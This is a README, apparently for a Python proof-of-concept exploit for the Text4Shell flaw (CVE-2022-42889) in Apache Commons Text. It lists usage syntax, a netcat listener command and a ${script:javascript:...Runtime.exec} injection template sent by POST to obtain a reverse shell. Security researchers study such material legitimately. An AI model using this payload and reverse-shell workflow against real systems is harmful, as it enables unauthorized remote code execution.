A custom Python-based proof-of-concept (PoC) exploit for Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions 1.5 through 1.9 (fixed in 1.10.0). It targets vulnerable Java applications that pass untrusted input to the StringSubstitutor
class with the default interpolators enabled, allowing injection of ${script:...}
expressions that execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
parameter; however, the vulnerable parameter name will vary between implementations. Adapt the payload and request path to the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
Description
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It achieves Remote Code Execution (RCE) via the insecure default interpolators (script, dns and url) when user input is dynamically evaluated by StringSubstitutor
.
Tested against: – Apache Commons Text < 1.10.0 – Java applications that evaluate ${script:...}
interpolation on untrusted input
Utilization
python3 text4shell.py <target> <lhost> <lport>
Instance
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
Make sure to set up a listener on your attacking machine first:
nc -nlvp 4444
Payload Logic
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell command is delivered in the data
parameter using a POST request to /data. Note that the script interpolator needs a JSR-223 JavaScript engine on the target JVM (Nashorn ships with JDK 8 through 14 and was removed in JDK 15), so on a newer JVM without one the lookup fails even though Commons Text itself is still vulnerable; the dns and url interpolators remain usable there for out-of-band confirmation.